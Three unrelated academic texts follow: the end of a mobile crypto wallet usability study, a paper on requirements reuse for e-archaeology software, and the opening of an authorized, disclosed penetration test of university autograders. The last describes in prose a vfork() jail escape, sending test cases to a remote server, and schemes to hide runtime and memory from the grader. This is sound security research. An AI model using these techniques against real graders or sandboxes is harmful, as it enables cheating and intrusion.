Trust - This theme emerges from reviews that reflect users' confidence in the mobile crypto wallet.
Table 6. Findings in trust theme

<table>
<thead>
<tr>
<th>Review Text</th>
<th>Insight</th>
</tr>
</thead>
<tbody>
<tr>
<td>A wallet you can trust that gives you full control over your earnings</td>
<td>Users prefer having more control over their financial assets.</td>
</tr>
<tr>
<td>It's really frustrating to trust this wallet when there are so many scams involving people pretending to be customer support!</td>
<td>The presence of proper customer support greatly impacts user trust.</td>
</tr>
</tbody>
</table>

Source: (Research Results, 2024)

Presently, certain mobile wallets exert a degree of indirect control over how customers administer their wallets. Our findings underscore the importance of providing users with maximal autonomy as a key factor in earning their trust. Additionally, the significance of robust customer support is reiterated within this theme.

Software Process Assessment Result

The foundational aspects of crypto wallets are anchored in four key features. Platform availability ensures accessibility across various devices and operating systems, promoting inclusivity and user adoption. Customizability, another vital factor, empowers users to personalize their wallet interfaces and functionalities, enhancing the overall user experience. On-ramp support is integral for facilitating the seamless conversion of traditional fiat currencies into cryptocurrencies, streamlining the entry process for newcomers. Incorporating a built-in crypto exchange within the wallet simplifies the trading experience and consolidates various financial activities into a single, user-friendly platform. Figure 4 shows the curated leading crypto wallets and their basic features. Only six crypto wallets have all the basic features defined in the manual survey.

Source: (Research Results, 2024)

Figure 4. Leading crypto wallet basic features

User experience is a cornerstone for crypto wallet adoption. The survey revealed significant elements contributing to a positive user experience. Diverse login methods, such as email authentication, ensure accessibility and strengthen security measures. Multi-protocol connection capability is essential for users managing diverse cryptocurrencies, enabling compatibility across different blockchain networks [13]. Integrating crypto name services through Ethereum Name Service (ENS) or an internal naming service enhances user-friendliness by replacing complex wallet addresses with human-readable names, reducing transaction friction. Figure 5 shows the curated leading crypto wallets with a great user experience. Only four crypto wallets meet all the user experience criteria in the manual survey.

Source: (Research Results, 2024)

Figure 5. Leading crypto wallet user experience

Security is paramount in the crypto space, and our survey unveiled several vital features enhancing wallet security. Multi-Party Computation (MPC) [14] and multi-signature (multi-sig) [15] functionalities employ advanced cryptographic techniques to fortify the security posture of wallets. Maximal extractable value [16] safeguards users against potential financial losses, limiting withdrawal amounts to mitigate risks. Anonymity features prioritize user privacy, addressing concerns within the decentralized landscape. Furthermore, the integration of hardware wallets adds an extra layer of security by keeping private keys offline, reducing susceptibility to online attacks, and bolstering overall confidence in the security of digital assets.
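As a rough illustration of how the survey tallies above (e.g., "only six wallets have all basic features") could be computed from an assessment matrix, here is a small sketch; the wallet names and feature flags are placeholders, not the study's data.

```python
# Hypothetical assessment matrix: wallet -> {criterion: met?}.
# The counts mirror the kind of totals reported for Figures 4-6.
basic_criteria = ["platform_availability", "customizability", "on_ramp", "built_in_exchange"]

assessment = {
    "WalletA": {"platform_availability": True, "customizability": True,
                "on_ramp": True, "built_in_exchange": True},
    "WalletB": {"platform_availability": True, "customizability": False,
                "on_ramp": True, "built_in_exchange": True},
    # ... one entry per surveyed wallet (21 platforms in the paper)
}

def meets_all(wallet_features, criteria):
    """True if a wallet satisfies every criterion in the list."""
    return all(wallet_features.get(c, False) for c in criteria)

complete = [w for w, feats in assessment.items() if meets_all(feats, basic_criteria)]
print(f"{len(complete)} wallet(s) have all basic features: {complete}")
```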
Figure 6 shows the curated leading crypto wallet with better security. Currently, no crypto wallets meet all the security criteria on the manual survey. Source: (Research Results, 2024) Figure 6. Leading crypto wallet security Mandatory Features Recommended for Future Design Based on insights derived from the thematic analysis, the incorporation of various features is suggested. Anticipated outcomes from implementing these features include a notable surge in positive reviews relative to negative ones for the application. This shift is expected to assist current and potential users in making informed decisions about adopting the mobile wallet. CONCLUSIONS The data classification identified four themes: domain-specific, security and privacy, misconceptions, and trust. The thematic analysis indicates that several features should be included in future mobile crypto wallets. These features are a well-designed user interface, 24/7 customer support, multi-cryptocurrency support, and two-factor authentication. Since the domain-specific theme was the most frequently identified (see Figure 3), it suggests that a well-designed user interface and multi-cryptocurrency support are the most crucial features for future mobile crypto wallets. Additionally, the other two features mentioned in Figure 7 are highly recommended to enhance trust between users and developers, thereby increasing the wallet’s credibility compared to competitors. The software process assessment has provided valuable insights into the strengths and areas for improvement within the landscape of crypto wallet development. Examining security measures, features, and usability has illuminated the current state of non-custodial hot wallets and laid the groundwork for enhancing overall effectiveness and user experience. The findings from our assessment underscore the importance of continuous improvement in crypto wallet usability and security while emphasizing user-centric features to ensure the long-term viability of crypto wallets. Future research could contribute to designing a crypto wallet architecture that pays attention to improving user experience while enhancing the digital financial ecosystem. REFERENCE [8] A. Voskobojnikov, O. Wiese, M. Mehrabi Koushki, V. Roth, and K. (Kosta) Beznosov,
The London Charter and the Seville Principles as sources of requirements for e-archaeology systems development purposes

Juan M. Carrillo Gea, Ambrosio Toval, José L. Fernández Alemán, Joaquín Nicolás and Mariano Flores

Software Engineering Research Group, Departamento de Informática y Sistemas de la Universidad de Murcia. Spain.

Abstract

Requirements engineering (RE) is a discipline of critical importance in software development. This paper provides a process and a set of software artefacts to help in the production of e-archaeology systems with emphasis on requirements reuse and standards. In particular, two important guidelines in the field of e-archaeology, the London Charter and the Principles of Seville, have been shown as two sources of requirements to be considered as a starting point for developing this type of systems.

Key words: E-ARCHAEOLOGY SYSTEMS DEVELOPMENT, REQUIREMENTS ENGINEERING, REUSE, STANDARDIZATION.

1 INTRODUCTION

Requirements engineering (RE) proposes the use of repeatable and systematic procedures to ensure obtaining a set of requirements (reqs) that is relevant, complete, consistent, and easily understandable and analysable by different stakeholders. According to the Standard Glossary of Software Engineering Terminology IEEE 610, a req is: (a) "a condition or capability needed by a user to solve a problem or achieve an objective"; (b) "condition or capability that must be met or possessed by a system or system component to satisfy a contract, standard, specification, or other formally imposed documents"; or (c) "a documented representation of a condition or capability as in (a) or (b)".

During the RE process, the following activities are performed cyclically: (1) identification and consensus (elicitation); (2) analysis and negotiation; (3) documentation (specification); and (4) validation of reqs. In addition, a further activity, reqs management, is often characterised; it refers to the scheduling, coordination and documentation of the other activities, controlling the changes in reqs.

The main objective of RE is to specify what a system has to do, and the design constraints that determine how it should be implemented, with the aim of developing correct software, i.e. software that works according to the customer needs. Hence it seems clear that the construction of a new system or the modification of an existing one should be made based on accurate knowledge of what is to be developed or changed. However, the RE process is often done inappropriately, so that the reqs specification is many times reduced to a simple, generic mission statement of a few pages. All this despite the fact that many empirical studies in recent years support the claim that reqs management is a critical process in the development of correct software.
One of the most common causes of runaway and failed projects are unstable reqs, along with making an inadequate estimation of project time and cost (GLASS, 2002). In most cases, instability of reqs is due to the fact that the customer or users do not really know their needs. Many authors point out errors related to reqs as the most expensive to correct when building software. In this sense, the most difficult problem to address is that reqs relevant to the project are not discovered in time. System and software reqs documents play a crucial role in software engineering (SE) in that they must both communicate reqs to customers in an understandable manner and define them in precise detail for developers. Archaeological environments can be seen as a complex socio-technical system with many different stakeholders involved (e.g. heritage managers, archaeologists, conservators, developers, analysts). Besides common reqs concerning any software (basic functionality, quality or security) there are specific e-archaeology domain reqs (constraints imposed by e-archaeology standards, expected or desired specific product functionality). A systematic and rigorous RE approach contributes to obtain interoperable, high-quality e-archaeology systems in a productive way. Using guidelines, recommendations and standards encourages interoperability (common terminology, concepts and procedures) but when these documents are used in a software development context, it is very useful—often necessary—to adapt, refine and express their contents in the form of explicit software and system reqs (see Software Requirements Specifications IEEE Std 830 and System Requirements Specifications IEEE Std 1233). The main contributions of the proposal described in this paper are: (1) definition of an infrastructure for a reusable reqs repository in the e-archaeology realm, integrating common reqs imposed by SE standards (e.g. Software Engineering Product Quality ISO/IEC 9126 or SQuaRe ISO/IEC 25000), e-archaeology guidelines and recommendations, provided by international consortia active in e-archaeology (i.e. the London Charter17 and the Principles of Seville18) and new product reqs; and (2) using the results above, definition of an RE process specific for e-archaeology systems development. The repository of reusable reqs catalogues provides a starting point for the subsequent software development, and supports the definition of e-archaeology software product lines (SPL). This approach is based upon previous work of our research group regarding a broad approach to reqs reuse, named SIREN (SImple REuse of RequiremeNts) (TOVAL, 2002; 2008). After this introduction, Section 2 introduces the SIREN method and the use of formal sources of information for reqs identification; Section 3 presents the infrastructure proposed (artefacts and process) and finally, Section 4 summarizes our conclusions and further work. --- 17 http://www.londoncharter.org/ 18 http://www.arqueologiavirtual.com/carta/ 2 REQUIREMENTS REUSE AND STANDARD GUIDELINES AND RECOMMENDATIONS In order to take advantage of the benefits of reuse at the reqs level, our group proposed the SIREN method, a practical approach for creating, selecting and specifying the reqs of a software system based on reuse and software engineering standards. SIREN encompasses a spiral process model, reqs documents templates, a reusable reqs repository organized by catalogues, and a supporting reqs management tool (SirenTool). 
These catalogues are organized in a hierarchy of reqs specification documents, which are structured according to IEEE standards (IEEE Std 830, IEEE Std 1233). The textual information of reqs is complemented by a set of attributes. There is a set of attributes common to all reqs (including priority, rationale, source, state, etc.), and additional attributes can be defined. Besides attributes, different traceability relationships can be defined to relate reqs: to sum up, these are inclusive, exclusive and parent-child traceability relationships. SIREN also deals with variability, e.g. through parameterized reqs, which contain some parts that have to be customized and that have to be instantiated when reused, and generic reqs, used as reqs patterns. Standard guidelines and recommendations contain technical specifications which ensure that materials, products, processes, services, systems, or persons are fit for their intended purpose, consequence of the experience both in industry and academy. Standards also provide common concepts and practices that encourage interoperability and technology transfer. However, in many cases these sources express the information in a too general form, sometimes introducing problems associated with natural language usage (e.g. ambiguity, imprecision or inconsistencies), sometimes with very different abstraction level information (all in one place or just lack of detail), making the adoption of these standards and their application difficult. Thus, we think it is necessary to adapt, refine and express their contents in the form of explicit reqs. SIREN catalogues and SIREN reqs structure provide the necessary means to achieve this goal as shown in our previous work in the field of e-learning (TOVAL, 2011; COS, 2012). Currently, the field of e-archaeology is growing very fast. There is a need for establishing solid foundations for this discipline, including both theoretical and practical issues. People involved in computer-based visualisation in the field of cultural heritage are confronted with new technological advances which have to be exploited, whereas barriers and difficulties are to be avoided as well. The London Charter is the most relevant international document dealing with government practices in the field of 3-dimensional visualisation in the research and communication of cultural heritage, and captures basic principles in this growing field. It was proposed by an interdisciplinary panel of researchers belonging to the community of experts in the use of 3-dimensional visualisation technologies in heritage research. There is a need for achieving greater rigour in the projects within the field of cultural heritage. The London Charter is aimed at filling this gap by means of a set of recommendations and specific guidance. Moreover, the London Charter offers “a robust foundation upon which communities of practice can build detailed London Charter Implementation Guidelines”. Given the high amount of valid approaches to the visualisation of cultural heritage and their complexity, specific implementation guidelines for each community of experts should be created. The International Forum of Virtual Archaeology drafted an international document governing the implementation of best practices in computer-based archaeological visualisation. The Principles of Seville followed the London Charter so as to “increase the conditions of applicability of the London Charter in order to improve its implementation specifically in the field of archaeological heritage”. 
Like its predecessor, this document provides recommendations and guidance, but it is focused on the specific needs of archaeological heritage in relation to cultural heritage. Since the theoretical framework for the Seville Principles is the London Charter, this document adopts the objectives approved by the Advisory Board of the London Charter. Both documents, the London Charter and the Principles of Seville, can be used as reqs sources for building SIREN catalogues as explained in the following section. 3 BASIS FOR AN E-ARCHAEOLOGY SYSTEMS SPL INFRASTRUCTURE The software factory (SF) concept (GREENFIELD & SHORT, 2004) refers to those software development organizations which can group together an important number of their products in the so called software product lines (SPL) (KÄKÖLÄ & DUEÑAS, 2006). Typically, SFs are able to systematize their production systems, mainly based upon reuse of a variety of artefacts (such as reqs, analysis or design models, code, and documentation). The current trend is towards SPLs in particular domains (such as banking or automotive fields). An SPL is defined by a set of systems sharing common features, which satisfy the specific needs of a particular sector. These systems are developed within the SPL from a pre-established set of assets or reusable artefacts. SPL development consists usually of two complementary processes: domain and product engineering. Reqs in a SPL define the common and variable features (domain level) as well as concrete products in such line (product level). Therefore, there is a process for building reusable catalogues (Domain Engineering) and another one for using them (Product Engineering). Although we define these processes sequentially, these are performed in an iterative and incremental way. The Domain Engineering process The activities in this group are carried out at the beginning of defining a new SPL and each time we wish to generate new catalogues within this SPL. Considering an SPL for computer-based visualisation of archaeological heritage, then a set of generic reqs catalogues of computer-based visualisation tools within the e-archaeology domain can be created: a) SPL Definition: A list of textual descriptions regarding high level issues which should be solved by means of the products of the SPL. Business processes potentially involved are also identified and textually described in a few paragraphs, to better describe a context. b) Problem Domain scope: In short, it consists of: b.1) Identifying main sources related to the domain to which the SPL belong: e-archaeology recommendations and guidelines, SE standards, legislation, problem-specific documents, etc. For example, the London Charter, the Principles of Seville and the ISO/IEC 25000 can be selected for the construction of a computer-based visualisation tool. Then, select, prioritize and schedule the generation of the detailed catalogues. b.2) Generating first version catalogues, for each one of the sources selected in the previous step. Typically, these will consist of a mapping from relevant text in the sources to software reqs, where common and variable features in the domain are described. Examples of reqs at this level are: S1. 
Digital preservation strategies should aim to preserve the computer-based visualisation data, rather than the medium on which they were originally stored, and also information sufficient to enable their use in the future, for example through migration to different formats or software emulation (Section 5.2, Principle 5: “Sustainability” from the London Charter). S2. The computer-based visualisation tool shall allow virtual recreation of archaeological heritage (Problem-specific domain document). c) Solution Domain scope: Generating detailed reusable reqs catalogues for each one of the sources selected. These catalogues will contain and refine the part of the reqs at the previous level, corresponding exactly to the kind of products provided by this SPL. Common and variable features, not just in the domain but in the particular SPL, are now described and detailed. Specific techniques, algorithms or procedures (even keeping variability) for implementing particular products in the SPL are now considered. Examples of refined reqs at this level are: C1. **The computer-based visualisation tool shall allow to preserve the computer-based visualisation data** (Refined from req S1; included in the London Charter catalogue). C2. **The computer-based visualisation tool shall store all the raw data and metadata to enable the migration of the computer-based visualisation data to [non empty set of file formats]** (Refined from req S1, with parameter [non empty set of file formats]; inclusive traceability relation with the req C1, that is, the reuse of C2 will imply the reuse of C1; included in the London Charter catalogue). C3. **The computer-based visualisation tool shall allow to use a virtual model to visually recover an archaeological site at a given moment in the past, including [non empty set of archaeological heritage]** (Refined from req S2, with parameter [non empty set of archaeological heritage]; included in the Computer-Based Visualisation Tool (CBVT) catalogue). At this point, reqs attributes such as identifier (e.g. C1), priority (e.g. high), source (e.g. Section 5.2, the London Charter) and person in charge (e.g. John) are incorporated. Both the reqs attributes and traceability relationships can also be reused. **The Product Engineering process** The activities in this group are carried out each time we wish to develop a new, specific e-archaeology product or evolve an existing one. For example, let us suppose that we intend to build a computer-based visualisation tool, addressed to landscape archaeology. The computer-based visualisation systems allow heritage experts to study landscape and to explore rich archaeological contexts. These systems collect data that can be useful in forming theory and rules of practice. Geophysical prospection is a good example of this, taking advantage of software that provides a host of data processing, georeferencing, and data display algorithms. As a result, landscape archaeology can use this technology to model a given landscape and move from data acquisition to content generation (CH’NG, 2011). **a) Product Definition:** Decide the main required features of the product (such as data acquisition, software quality, etc.), selecting them from a pre-defined form and providing weights within a homogeneous scale. This form identifies high-level abstraction functional and non-functional reqs, both archaeological and general purpose. For example, Sustainability: HLR1. 
Where digital archiving is not the most reliable means of ensuring the long-term survival of a computer-based visualisation outcome, a partial, two-dimensional record of a computer-based visualisation output, evoking as far as possible the scope and properties of the original output, should be preferred to the absence of a record; and Software quality: HLR2. Check that each test requirement is linked to a test case. A first specification, the so-called "Initial product specification", including a prioritized list of main required features, is generated.

**b) Select Sources and Catalogues:** Select the available catalogues related to features in the "Initial product specification". For example, the available London Charter catalogue might be reused to describe how to store the visualisation outcome mentioned in HLR1. Then, for those features not considered in our existing repository of catalogues, identify related and applicable sources of interest. For example, when the complexity of the datasets captured is very high, the feature "The computer-based visualisation tool shall implement data mining techniques to analyse the visualisation data" is not in the SPL catalogues. In this case, information sources related to data mining techniques should be selected. At this point, and according to the existing budget, we can decide either that it is worthwhile to build new catalogues corresponding to these features/sources (e.g. if they can be reused in further projects) or just to use the sources directly to obtain new reqs for our product requirements specification (PRS) (part of the so-called deltas).

**c) Instantiate/Reuse reqs:** By using the selected, available or newly built catalogues, obtain a first version of the PRS populated with reused reqs. Examples of product reqs at this level are:

R1. The computer-based visualisation tool shall allow preserving the computer-based visualisation data (Used as it was in the previous step).

R2. The computer-based visualisation tool shall store all the raw data and metadata to enable the migration of the computer-based visualisation data to SVG (From parameterized req C2, with alternatives SMIL, SVG and X3D; the trace from R1 would also be instantiated).

R3. The computer-based visualisation tool shall allow to use a virtual model to visually recover an archaeological site at a given moment in the past, including landscape (From parameterized req C3, with alternatives material culture, environment, landscape, customs, and general cultural significance).

**d) Elicit reqs:** Add to the PRS new, specific reqs for this product (deltas).

**e) Analyse and Negotiate:** Check possible inconsistencies and problems coming from the integration of reused and newly elicited (delta) reqs. Resolve possible different views and interests of participating stakeholders.

**f) Validate & Verify reqs:** To ensure the quality of the PRS created, check it to guarantee both that the resulting product will perform as expected in the user's environment, and full compliance with the RE processes and standards used for the PRS (e.g. IEEE Std 830).

Activities d, e, and f are typical of any RE process, while the others help to configure a specific e-archaeology SPL. Note that these steps are applied iteratively and incrementally until an approved PRS is achieved (the so-called baseline).
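The catalogue-and-instantiation mechanics of steps b) and c) can be pictured with a small data-structure sketch. It is illustrative only, not SIREN or SirenTool: the class names and the way parameters are encoded with square-bracket placeholders are assumptions made for the example.

```python
# Minimal sketch of a reusable requirements catalogue with parameterized
# requirements and inclusive traceability relationships between them.
from dataclasses import dataclass, field

@dataclass
class Requirement:
    req_id: str
    text: str                     # may contain "[parameter]" placeholders
    source: str                   # e.g. a London Charter section
    includes: list = field(default_factory=list)   # inclusive traces

catalogue = {
    "C1": Requirement("C1", "The tool shall allow preserving the visualisation data.",
                      "London Charter, Section 5.2"),
    "C2": Requirement("C2", "The tool shall store raw data and metadata to enable "
                      "migration of the visualisation data to [file_formats].",
                      "London Charter, Section 5.2", includes=["C1"]),
}

def instantiate(cat, req_id, **params):
    """Reuse a catalogue req, filling its parameters; pull in inclusively traced reqs."""
    req = cat[req_id]
    text = req.text
    for name, value in params.items():
        text = text.replace(f"[{name}]", value)
    reused = [text]
    for dep in req.includes:            # reuse of C2 implies reuse of C1
        reused.extend(instantiate(cat, dep))
    return reused

# Product engineering step c): instantiate C2 with the chosen file format.
for line in instantiate(catalogue, "C2", file_formats="SVG"):
    print(line)
```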
4 CONCLUSIONS AND FUTURE WORK This approach aims at helping in the production of e-archaeology systems according to SE and RE best practices. Independently of any particular process model, our proposal can be integrated with common practices in organizations devoted to software development in the cultural heritage realm, just by adapting the structure of the reqs documents. Catalogues provide a well-organized set of quality reqs, improving on the related information from the original sources. The identification and selection of suitable sources of reqs for e-archaeology systems development is quite difficult, given that few standardisation initiatives have been taken so far. There is a need for further and more technically detailed guidance and regulation in computer-based visualisation in e-archaeology and related domains, since these efforts will provide the foundations for improving product quality and process productivity. The expansion and refinement of the guidelines included in the London Charter and the Seville Principles should be gradually addressed. Reqs catalogues can then be created, starting from the highest-priority and most widely used or most important sources (e.g. those that are mandatory by law). The more catalogues we have in our repository, the better rates we will obtain in productivity (reusing and instantiating reqs is faster than defining them from scratch), quality (reused reqs are improved, potentially in each iteration) and interoperability (catalogues based upon standards). In the near future, we plan to define a taxonomy of cultural heritage systems, with the purpose of: (1) making it easier to identify common features/reqs for the different groups found; and (2) helping to decide the direction to be taken in defining the corresponding implementation guidelines and standards. ACKNOWLEDGMENTS This research is part of the project PEGASO-PANGEA (TIN2009-13718-C02-02), financed by the Spanish Ministry of Science and Innovation (Spain). REFERENCES
{"Source-Url": "https://polipapers.upv.es/index.php/var/article/download/4275/4435", "len_cl100k_base": 4559, "olmocr-version": "0.1.53", "pdf-total-pages": 7, "total-fallback-pages": 0, "total-input-tokens": 19535, "total-output-tokens": 5297, "length": "2e12", "weborganizer": {"__label__adult": 0.0005064010620117188, "__label__art_design": 0.0015115737915039062, "__label__crime_law": 0.0006346702575683594, "__label__education_jobs": 0.005767822265625, "__label__entertainment": 0.00010722875595092772, "__label__fashion_beauty": 0.0002582073211669922, "__label__finance_business": 0.0005412101745605469, "__label__food_dining": 0.0004208087921142578, "__label__games": 0.0006289482116699219, "__label__hardware": 0.0018911361694335935, "__label__health": 0.0005998611450195312, "__label__history": 0.004558563232421875, "__label__home_hobbies": 0.0001928806304931641, "__label__industrial": 0.0009541511535644532, "__label__literature": 0.0007238388061523438, "__label__politics": 0.00030112266540527344, "__label__religion": 0.0006227493286132812, "__label__science_tech": 0.12420654296875, "__label__social_life": 0.0001627206802368164, "__label__software": 0.028045654296875, "__label__software_dev": 0.82568359375, "__label__sports_fitness": 0.0002703666687011719, "__label__transportation": 0.0007081031799316406, "__label__travel": 0.0004892349243164062}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 23952, 0.01404]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 23952, 0.51706]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 23952, 0.8759]], "google_gemma-3-12b-it_contains_pii": [[0, 2720, false], [2720, 6482, null], [6482, 10565, null], [10565, 14445, null], [14445, 18653, null], [18653, 22462, null], [22462, 23952, null]], "google_gemma-3-12b-it_is_public_document": [[0, 2720, true], [2720, 6482, null], [6482, 10565, null], [10565, 14445, null], [14445, 18653, null], [18653, 22462, null], [22462, 23952, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 23952, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 23952, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 23952, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 23952, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 23952, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 23952, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 23952, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 23952, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 23952, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 23952, null]], "pdf_page_numbers": [[0, 2720, 1], [2720, 6482, 2], [6482, 10565, 3], [10565, 14445, 4], [14445, 18653, 5], [18653, 22462, 6], [22462, 23952, 7]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 23952, 0.0]]}
olmocr_science_pdfs
2024-12-06
2024-12-06
b17738f904f01e228ad9f60f48ab9873d593aeac
Revenge for Late Nights: Penetration Testing of University Autograders Ian Pudney *University of Michigan* ipudney@umich.edu Ryan Wawrzaszek *University of Michigan* ryanwawr@umich.edu Austin Yarger *University of Michigan* ayarger@umich.edu Abstract Whether it be the promise of world-changing technologies or the allure of well-paying jobs, students are flooding into Computer Science programs at universities worldwide. Such an influx puts stress on traditional methods of assignment evaluation, and has led to an enhanced emphasis on autograding systems — software that takes student code and evaluates it automatically. In this paper, we analyze the potential for cheating or exploiting such autograders by investigating several real-world systems in use at the University of Michigan. We examine the defenses implemented by these autograding systems and demonstrate vulnerabilities in several of them by mounting attacks ranging from privilege escalation to exfiltration of sensitive test cases. Our findings indicate that the most secure autograders adhere to a “defense in depth” strategy, relying on a combination of security mechanisms that include strict authentication, comprehensive logging, and the use of professionally developed open-source frameworks for sandboxing and containerization of untrusted code. 1 Introduction Academic cheating, a common result of procrastination and anxiety, manifests traditionally in many forms, including copying answers from another student, altering the gradebook, or obtaining exam solutions ahead of time. As grading becomes more digital and automated, one must consider these threats in a new digital context, and how our technological approach to grading might be hardened against modern threats to academic integrity. In sections 2 and 3, we introduce the concept of autograders and establish a simple submission-evaluation model for autograding systems in general. In sections 5-8, we report on the architecture of four distinct autograders in use at the University of Michigan, discussing their strengths and weaknesses, and illustrating our attacks against them and potential defenses. We conclude by distilling some best practices and general security tips for autograder development. 2 Related Work Literature on autograder security is fairly rare, and many papers mention it only in passing [2]. However, a core requirement of autograders is the establishment of a sandbox for evaluation purposes, on which plenty of literature can be found [4, 3]. This paper investigates at a higher level, considering the use of sandboxes in autograder security, but not the low-level details of sandbox implementation. 3 Autograder Model The role of the typical autograder can be split into two primary tasks: the submission of code, and the evaluation of code. Both include distinct security challenges which are outlined in this section. In the discussions that follow, "student" refers to someone who submits code to an autograder for evaluation. 3.1 Submission A student looking to complete an autograded assignment must, at some point, submit that code to be graded. There are a few interesting points of investigation here, namely Authentication (is the submission taking place on behalf of the proper student?) and Injection (is there something about the submission interface that allows for the unintended execution of scripts or code?). 3.2 Evaluation Upon submission, code must be compiled, executed, and evaluated.
Autograders are unique in that foreign code injection and execution is expected. This presents an ideal situation for an attacker. Potential attacks can be mitigated by adhering to a few general principles. First, untrusted code should be run in a restricted environment with only the level of privilege necessary to complete the evaluation. Code should be run in a sandbox, and potentially dangerous system calls should be prohibited. Additionally, the party submitting code to the autograder should not be able to influence the evaluation process once it has begun. A student submitting for a grade has significant incentive to compromise the integrity of an evaluation; therefore, the student should not control the machine in which the autograding system executes. Finally, test cases, inputs fed to a student program to test for correct output and functionality, serve as a primary means of evaluation in autograding systems. Should test cases become publicly available, the integrity of the evaluation is compromised, as a student knowing the test cases may rely on hard coding outputs for specific cases, rather than developing a correct general solution. Therefore, test case exfiltration must be prevented. 4 Methodology A study of autograder security benefits heavily from access to production-level autograders. Our team received permission from the staff of four University of Michigan Computer Science courses to perform penetration tests against their autograders. In one of the courses, a dummy system was set up specifically for our testing. In another, we were given access to a virtual machine containing an instance of the autograder. In yet another, our team was allowed to penetration test the production autograder. To obtain these permissions, we agreed not to publish autograder source code or test cases. For the course in which we penetration tested the live autograder, we imposed our own restriction that we would not mount attacks if those attacks might disrupt autograder functionality for normal students. Prior to the presentation of our results, each course staff received a disclosure document outlining discovered vulnerabilities and giving detailed recommendations on how to fix them. 5 EECS 281 EECS 281 (Data Structures and Algorithms) is a course at the University of Michigan dedicated to writing efficient code. While merely getting the correct answer is sufficient for a perfect score in many classes, EECS 281 students must write correct code that adheres to strict time and memory limits, which many students struggle with. These efficiency limits, which are unique to this course, will be the focus of our investigation. 5.1 Submission Architecture Student code is compressed into a tarball (.tar.gz file) and submitted for grading via a web form. Submission results become available on the web form in real time as grading occurs. Results indicate whether the program output was correct, how much time and memory the submission used, the time and memory limits, and the program termination condition, such as a signal. If the student’s submission is incorrect, the web form also provides the student a small section of output that differs. 5.2 Evaluation Architecture After a student submits, their code is unpacked from the tarball, compiled, and run with various text inputs. Student code is not run directly as a child process of a grading script. 
Instead, it is run as child of a custom “jail” program, which uses chroot to restrict the execution of a student’s program to a particular directory and ptrace to disallow certain system calls. The ptrace API follows the POSIX standard for debugging, providing features such as breakpoints and signal catching. Upon receiving a submission, the jail script first forks a child, then, before that child runs the student executable, it attaches itself to the child via ptrace and notifies the jail whenever the student’s code makes a system call. If this call is not in the whitelisted set of system calls, the jail terminates the submission with an EPERM (“Operation not permitted”) signal. Once the student’s code has finished, the autograder compares its output to the expected output, typically with a simple diff. If the output is correct, the autograder computes the program runtime as the sum of the user and system time and computes the memory the program used as the maximum size of the valid portion of the program’s arena. These metrics are then used to compute the student’s score. 5.3 Exploitation Jailbreak Many interesting functions, such as fork() and clone(), are prohibited by the jail. vfork(), however, is not. vfork() is an optimized version of fork(), which creates a new process but shares the parent’s page table until either exit() or an exec-family function is called. If the child process does anything other than call one of those functions, its behavior is undefined. We were able to take advantage of this by using vfork() to create a child process that was not controlled by the jail and that could, therefore, make system calls which would otherwise be prohibited. This allowed for several interesting exploits that will be discussed below. **Test Case Exfiltration** The EECS 281 autograder runs student code with a variety of different inputs. It is imperative that these test cases remain secret, else students could cheat by simply hardcode their programs to give the correct output for each specific test. One way students could steal these test cases would be to submit a program that connects to a remote server controlled by the student and sends the test input to that server. To ensure these test cases remain secret, the EECS 281 autograder jail prevents students from accessing the network by prohibiting the `socket()` system call. However, after executing the jailbreak described in the previous section, we were able to upload such a specially crafted submission and exfiltrate the test cases from the autograder. **Computational Overhead Hiding** The EECS 281 autograder measures not just the correctness of student programs, but their runtime and memory efficiency as well. If a student could “offload” computation to somewhere other than the program being measured, they could circumvent the time and memory limits by making their program appear more efficient than it actually is. The Linux `time` operations account for time used by subprocesses, so simply spawning one child process using `vfork()` is not sufficient to accomplish this. However, it is possible to bypass this limitation. Our approach is described below, and a diagram is included in Figure 1, Appendix A: 1. The parent process opens a two-way pipe. 2. The parent process spawns a ”first intermediate” child process using `vfork()`. This causes the parent process to become blocked. 3. 
The first intermediate process spawns a ”second intermediate” child process using the normal `fork()` function, then begins waiting on the read end of the two-way pipe. 4. The second intermediate process spawns the ”worker” child process using `fork()`, then exits. 5. The worker process has its parent PID changed to 1, because its actual parent has died. Its time and memory usage will no longer be attributed to the original process. 6. The worker process spends as much time and uses as much memory as it likes, then writes the output to the write end of the pipe and exits. 7. The first intermediate process becomes unblocked when it receives data on the pipe. The time spent waiting on the pipe does not contribute to either user or system time. The intermediate process then stores the received data in memory which is shared with the parent process as a result of being spawned with `vfork()`. This process then exits. 8. The parent process is allowed to continue, and simply returns the data it finds in memory. Using this approach, we were able to convince the autograder that our submission met the time and memory restrictions, when, in fact, it ran hundreds of times longer than should have been allowed. **Memory hiding** Even without using the jailbreak, we were able to hide memory by depositing it into files or pipes. It is trivial for a student program to exceed memory limits by creating a temporary file or two-way pipe, then writing its memory into said file/pipe. The program can recover access to this memory simply by reading it back. This allows a student to hide some of their memory usage at the cost of additional system time. We successfully executed this attack using a pipe, and we believe it should work for normal files as well. **Blocking Persistence** The autograder measures user/system time, but not real time. This is sensible, as real time is unstable when the server is under load, whereas user and system time measure the actual amount of time the process is running. However, if a process is blocked, it contributes to neither user nor system time. This means that if a student accidentally or intentionally makes a blocking system call, the autograder will never kill their process, and their submission will become ”stuck”. We were able to achieve this by reading from a pipe that was never written to. **Known Vulnerabilities** The EECS 281 autograder runs a very old version of Linux which has known vulnerabilities (Linux g281-3.eecs.umich.edu 3.10.0-229.20.1.e17.x86_64 #1 SMP Thu Sep 24 